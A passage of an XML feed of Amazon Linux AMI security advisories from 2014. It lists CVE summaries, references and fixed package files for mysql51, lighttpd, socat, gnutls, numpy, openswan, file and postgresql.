</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0978" title="" id="CVE-2014-0978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1235" title="" id="CVE-2014-1235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1236" title="" id="CVE-2014-1236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-php" version="2.30.1" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php-2.30.1-12.37.amzn1.x86_64.rpm</filename></package><package name="graphviz-php" version="2.30.1" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php-2.30.1-12.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-298</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-298: medium priority package update for mysql51</title><issued date="2014-03-06 14:56:00" /><updated date="2014-09-16 22:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0437:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0412:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0402:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0401:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0393:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0386:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0001:
A buffer overflow flaw was found in the way the MySQL command line client tool (mysql) processed excessively long version strings. If a user connected to a malicious MySQL server via the mysql client, the server could use this flaw to crash the mysql client or, potentially, execute arbitrary code as the user running the mysql client.
CVE-2013-5908:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5908" title="" id="CVE-2013-5908" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0001" title="" id="CVE-2014-0001" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0386" title="" id="CVE-2014-0386" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0393" title="" id="CVE-2014-0393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0401" title="" id="CVE-2014-0401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0402" title="" id="CVE-2014-0402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0412" title="" id="CVE-2014-0412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0437" title="" id="CVE-2014-0437" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0164.html" title="" id="RHSA-2014:0164" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51-server" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-bench" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.73-3.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-299</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-299: medium priority package update for lighttpd</title><issued date="2014-03-06 14:57:00" /><updated date="2014-09-16 22:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4560:
Use-after-free vulnerability in lighttpd before 1.4.33 allows remote attackers to cause a denial of service (segmentation fault and crash) via unspecified vectors that trigger FAMMonitorDirectory failures.
1029664:
CVE-2013-4560 lighttpd: Use after free if FAMMonitorDirectory fails
CVE-2013-4559:
lighttpd before 1.4.33 does not check the return value of the (1) setuid, (2) setgid, or (3) setgroups functions, which might cause lighttpd to run as root if it is restarted and allows remote attackers to gain privileges, as demonstrated by multiple calls to the clone function that cause setuid to fail when the user process limit is reached.
1029663:
CVE-2013-4559 lighttpd: setuid/setgid/setgroups return value check
CVE-2013-4508:
lighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphers, which makes it easier for remote attackers to hijack sessions by inserting packets into the client-server data stream or obtain sensitive information by sniffing the network.
1026566:
CVE-2013-4508 lighttpd: uses vulnerable cipher suites when SNI is used
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4508" title="" id="CVE-2013-4508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4559" title="" id="CVE-2013-4559" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4560" title="" id="CVE-2013-4560" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-fastcgi" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.34-4.12.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.34-4.12.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.34-4.12.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.34-4.12.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.34" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-300</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-300: low priority package update for socat</title><issued date="2014-03-06 14:57:00" /><updated date="2014-09-16 22:36:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0019:
Stack-based buffer overflow in socat 1.3.0.0 through 1.7.2.2 and 2.0.0-b1 through 2.0.0-b6 allows local users to cause a denial of service (segmentation fault) via a long server name in the PROXY-CONNECT address in the command line.
1057746:
CVE-2014-0019 socat: PROXY-CONNECT address overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0019" title="" id="CVE-2014-0019" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="socat-debuginfo" version="1.7.2.3" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-debuginfo-1.7.2.3-1.10.amzn1.x86_64.rpm</filename></package><package name="socat" version="1.7.2.3" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-1.7.2.3-1.10.amzn1.x86_64.rpm</filename></package><package name="socat" version="1.7.2.3" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/socat-1.7.2.3-1.10.amzn1.i686.rpm</filename></package><package name="socat-debuginfo" version="1.7.2.3" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/socat-debuginfo-1.7.2.3-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-301</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-301: important priority package update for gnutls</title><issued date="2014-03-06 14:58:00" /><updated date="2014-09-17 22:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0092:
It was discovered that GnuTLS did not correctly handle certain errors that could occur during the verification of an X.509 certificate, causing it to incorrectly report a successful verification. An attacker could use this flaw to create a specially crafted certificate that could be accepted by GnuTLS as valid for a site chosen by the attacker.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0092" title="" id="CVE-2014-0092" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0246.html" title="" id="RHSA-2014:0246" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="13.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-13.11.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-13.11.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-13.11.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-13.11.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-13.11.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="13.11.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-13.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-302</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-302: low priority package update for numpy</title><issued date="2014-03-10 09:40:00" /><updated date="2014-09-17 22:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1859:
1062009:
CVE-2014-1858 CVE-2014-1859 numpy: f2py insecure temporary file use
CVE-2014-1858:
1062009:
CVE-2014-1858 CVE-2014-1859 numpy: f2py insecure temporary file use
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1858" title="" id="CVE-2014-1858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1859" title="" id="CVE-2014-1859" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="numpy-doc" version="1.7.2" release="8.10.amzn1" epoch="1" arch="noarch"><filename>Packages/numpy-doc-1.7.2-8.10.amzn1.noarch.rpm</filename></package><package name="numpy" version="1.7.2" release="8.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/numpy-1.7.2-8.10.amzn1.x86_64.rpm</filename></package><package name="numpy-f2py" version="1.7.2" release="8.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/numpy-f2py-1.7.2-8.10.amzn1.x86_64.rpm</filename></package><package name="numpy-debuginfo" version="1.7.2" release="8.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/numpy-debuginfo-1.7.2-8.10.amzn1.x86_64.rpm</filename></package><package name="numpy-f2py" version="1.7.2" release="8.10.amzn1" epoch="1" arch="i686"><filename>Packages/numpy-f2py-1.7.2-8.10.amzn1.i686.rpm</filename></package><package name="numpy-debuginfo" version="1.7.2" release="8.10.amzn1" epoch="1" arch="i686"><filename>Packages/numpy-debuginfo-1.7.2-8.10.amzn1.i686.rpm</filename></package><package name="numpy" version="1.7.2" release="8.10.amzn1" epoch="1" arch="i686"><filename>Packages/numpy-1.7.2-8.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-303</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-303: medium priority package update for openswan</title><issued date="2014-03-10 09:40:00" /><updated date="2014-09-17 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6466:
A NULL pointer dereference flaw was discovered in the way Openswan's IKE daemon processed IKEv2 payloads. A remote attacker could send specially crafted IKEv2 payloads that, when processed, would lead to a denial of service (daemon crash), possibly causing existing VPN connections to be dropped.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6466" title="" id="CVE-2013-6466" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0185.html" title="" id="RHSA-2014:0185" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openswan-doc" version="2.6.37" release="3.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-doc-2.6.37-3.17.amzn1.x86_64.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="3.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-debuginfo-2.6.37-3.17.amzn1.x86_64.rpm</filename></package><package name="openswan" version="2.6.37" release="3.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-2.6.37-3.17.amzn1.x86_64.rpm</filename></package><package name="openswan" version="2.6.37" release="3.17.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-2.6.37-3.17.amzn1.i686.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="3.17.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-debuginfo-2.6.37-3.17.amzn1.i686.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="3.17.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-doc-2.6.37-3.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-304</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-304: medium priority package update for file</title><issued date="2014-03-13 18:12:00" /><updated date="2014-09-17 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1943:
Fine Free file before 5.17 allows context-dependent attackers to cause a denial of service (infinite recursion, CPU consumption, and crash) via a crafted indirect offset value in the magic of a file.
1065836:
CVE-2014-1943 file: infinite recursion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943" title="" id="CVE-2014-1943" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-debuginfo" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="file" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="python-magic" version="5.11" release="13.14.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.11-13.14.amzn1.noarch.rpm</filename></package><package name="file-libs" version="5.11" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.11-13.14.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.11-13.14.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.11-13.14.amzn1.i686.rpm</filename></package><package name="file-static" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.11-13.14.amzn1.i686.rpm</filename></package><package name="file" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.11-13.14.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.11" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.11-13.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-305</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-305: important priority package update for postgresql8</title><issued date="2014-03-13 18:12:00" /><updated date="2014-09-17 22:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0066:
It was found that the chkpass extension of PostgreSQL did not check the return value of the crypt() function. An authenticated database user could possibly use this flaw to crash PostgreSQL via a null pointer dereference.
CVE-2014-0065:
Multiple potential buffer overflow flaws were found in PostgreSQL. An authenticated database user could possibly use these flaws to crash PostgreSQL or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0064:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in various type input functions in PostgreSQL. An authenticated database user could possibly use these flaws to crash PostgreSQL or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0063:
Multiple stack-based buffer overflow flaws were found in the date/time implementation of PostgreSQL. An authenticated database user could provide a specially crafted date/time value that, when processed, could cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0062:
A race condition was found in the way the CREATE INDEX command performed multiple independent lookups of a table that had to be indexed. An authenticated database user could possibly use this flaw to escalate their privileges.
CVE-2014-0061:
A flaw was found in the validator functions provided by PostgreSQL's procedural languages (PLs). An authenticated database user could possibly use this flaw to escalate their privileges.
CVE-2014-0060:
It was found that granting an SQL role to a database user in a PostgreSQL database without specifying the "ADMIN" option allowed the grantee to remove other users from their granted role. An authenticated database user could use this flaw to remove a user from an SQL role which they were granted access to.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0060" title="" id="CVE-2014-0060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0061" title="" id="CVE-2014-0061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0062" title="" id="CVE-2014-0062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0063" title="" id="CVE-2014-0063" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0064" title="" id="CVE-2014-0064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0065" title="" id="CVE-2014-0065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0066" title="" id="CVE-2014-0066" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0211.html" title="" id="RHSA-2014:0211" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql8-pltcl" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.20-1.44.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.20-1.44.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.20" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.20-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-306</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-306: important priority package update for postgresql9</title><issued date="2014-03-13 18:12:00" /><updated date="2014-09-17 22:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0066:
It was found that the chkpass extension of PostgreSQL did not check the return value of the crypt() function. An authenticated database user could possibly use this flaw to crash PostgreSQL via a null pointer dereference.
CVE-2014-0065:
Multiple potential buffer overflow flaws were found in PostgreSQL. An authenticated database user could possibly use these flaws to crash PostgreSQL or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0064:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in various type input functions in PostgreSQL. An authenticated database user could possibly use these flaws to crash PostgreSQL or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0063:
Multiple stack-based buffer overflow flaws were found in the date/time implementation of PostgreSQL. An authenticated database user could provide a specially crafted date/time value that, when processed, could cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
CVE-2014-0062:
A race condition was found in the way the CREATE INDEX command performed multiple independent lookups of a table that had to be indexed. An authenticated database user could possibly use this flaw to escalate their privileges.
CVE-2014-0061:
A flaw was found in the validator functions provided by PostgreSQL's procedural languages (PLs). An authenticated database user could possibly use this flaw to escalate their privileges.
CVE-2014-0060:
It was found that granting an SQL role to a database user in a PostgreSQL database without specifying the "ADMIN" option allowed the grantee to remove other users from their granted role. An authenticated database user could use this flaw to remove a user from an SQL role which they were granted access to.
